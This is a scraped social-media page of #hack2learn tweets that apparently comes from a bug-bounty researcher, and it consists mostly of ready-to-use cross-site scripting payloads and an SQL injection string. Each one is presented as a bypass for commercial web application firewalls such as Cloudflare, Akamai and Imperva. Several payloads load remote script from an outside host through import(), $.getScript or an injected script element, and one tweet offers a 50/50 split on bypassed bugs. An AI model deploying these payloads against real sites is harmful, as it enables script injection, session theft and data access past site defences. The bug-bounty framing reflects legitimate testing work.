Top Tweets for #hack2learn
JSi - Escape the Escape
Chinese & Japanese Charsets
GBK, GBK2312, GBK19030
%81'/alert(1)//
ISO-2022-JP
%1B%28%4A'/alert(1)//
Bypass this filter:
'-alert(1)-' ➡️ \'-alert(1)-\'
\'-alert(1)// ➡️ \\\'-alert(1)//
More tricks in the ebook:
https://t.co/3lfdL6Lcqt
#hack2learn
Brute Staged XSS Payload
Stage 1 - No parentheses, high obfuscation:
innerHTML=URL,outerHTML=textContent
Stage 2 - Never sent to server, customizable:
&#60Img/Src/OnError=alert(1)&#62k
Example: https://t.co/795nC9jksV
Reference: https://t.co/byAmoq8WG1
#hack2learn
People assume wrong things all the time, try to spot that and you have an edge.
That's actually how we hack and bypass things.
#hack2learn.
Another variation of the classic #XSS #CloudFlare #WAF bypass.
Instead of:
1"><Svg/OnLoad=alert(1)>
Use:
1"Onxx=><Svg/Onload=alert(1)//
#hack2learn
@h4x0r_dz In labs you know exactly where the vulnerability or the vulnerable parameter is, and also there are no WAFs in place. But in the real world, you first need to analyze the flow 7-8 times, then find an injection point, and then try to exploit it
so labs ≠ real targets.
#hack2learn
Another #XSS Payload to Rule Them All!
#Bypass Imperva, Akamai and CloudFlare WAF
=> Prepend with 50 chars then use
1"><A HRef=%26quot AutoFocus OnFocus%0C={import(/https:https://t.co/Ng2aOLONda)}>
PoC: https://t.co/k2GsBxMmG5
#hack2learn @KN0X55
One #XSS Payload to Rule Them All
#Bypass Akamai, Imperva and CloudFlare #WAF
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
#hack2learn @KN0X55
BypaXSS
Free tool to build #XSS bypass vectors and payloads.
First version available, still in development.
https://t.co/QFXUyQnOz3
#hack2learn
A trick using PHP's weird behavior if a WAF decodes everything before parsing.
It might start filtering considering the anchor with dangling (but hamrless) markup instead of the real #XSS vector.
param%00p%3D<A/Href="<Svg/OnLoad=alert(1)//
https://t.co/o75F5SPpey
#hack2learn
P2 - Stored XSS using mixed encoding.
Payload:
&ltimg onerror&#61;alert(123) src&gt
While testing for stored XSS, always test different encodings: (semicolons ; aren’t always required).
HEX NUM HTML UNI
< &#x3c &#60 &lt \u003C
> &#x3e &#62 &gt \u003E
#hack2learn
Best Alternatives to alert(1) #XSS Payload
1. import('//X55.is')
https://t.co/44PpUdSWrz
2. $.getScript('//X55.is') *
https://t.co/nDsnfNDcMo
3. appendChild(createElement`script`).src='//X55.is'
https://t.co/5u88Jwbwmc
* requires jQuery loaded on DOM
#hack2learn
Improve your #BugBounty reports
Using a Remote #XSS Call
1. import('//X55.is')
https://t.co/44PpUdSoC1
2. $.getScript`//X55.is` (requires jQuery)
https://t.co/ZQyAdexV0F
3. appendChild(createElement`script`).src='//X55.is' https://t.co/5u88JwaYwE
#hack2learn #hack2earn
Hey bug hunter!
Do you have a WAF or any other filter in your way?
Let's COLLABORATE! 🤩
Any bug, 50/50 just DM me with details.
#hack2learn
JSi - Escape the Escape
Chinese and Japanese Charsets
GBK, GBK2312, GBK19030
%81'/alert(1)//
ISO-2022-JP
%1B%28%4A'/alert(1)//
For when a filter does that:
'-alert(1)-' ➡️ \'-alert(1)-\'
\'-alert(1)// ➡️ \\\'-alert(1)//
#XSS #bypass #hack2learn
https://t.co/ULkhcUmwH3
Between white and black, there's a lot of grey.
#Hacking
That's something you learn in LIFE itself.
#hack2learn
#DidYouKnow?
You can create a #XSS vector with almost ANY tag name and the ONFOCUS event handler using the following keywords:
ContentEditable AutoFocus
Example:
<XSS ContentEditable AutoFocus OnFocus=alert(1)>
Check it out:
https://t.co/nGtBvSITdn
#hack2learn
Best Alternatives to "alert(1)" #XSS Payload
1. import('//X55.is')
https://t.co/44PpUdSoC1
2. $.getScript('//X55.is')
https://t.co/nDsnfNCEWQ
3. appendChild(createElement'script').src='//X55.is'
https://t.co/OW6tE3xCdl
Tip: use src attribute to store '//X55.is'.
#hack2learn
Develop your true hacking skills with Static Analysis, #XSS and Bash.
#hack2learn
https://t.co/CgcKyD6gVM
#SQL Injection #Bypass Akamai #WAF
(Using #HPP)
q=1'Union DistinctRow/*&q=*/Select 1
#hack2learn 💪
Just another interesting construct for #XSS disguising the tag name, event handler and JS code as a fully validated URL.
<<https:https://t.co/OL3UAun0OS AutoFocus ContentEditable>>
PoC
https://t.co/MmFuukCJ5S
#hack2learn
Last Seen Hashtags on Sotwe
Trends for you
Most Popular Users
Elon Musk 
@elonmusk
240.1M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
108.8M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.2M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.5M followers
KATY PERRY
@katyperry
86.7M followers
Taylor Swift
@taylorswift13
80.5M followers
Lady Gaga
@ladygaga
72.1M followers
Kim Kardashian
@kimkardashian
69.3M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.4M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61M followers
X
@x
60.9M followers
CNN Breaking News
@cnnbrk
59.9M followers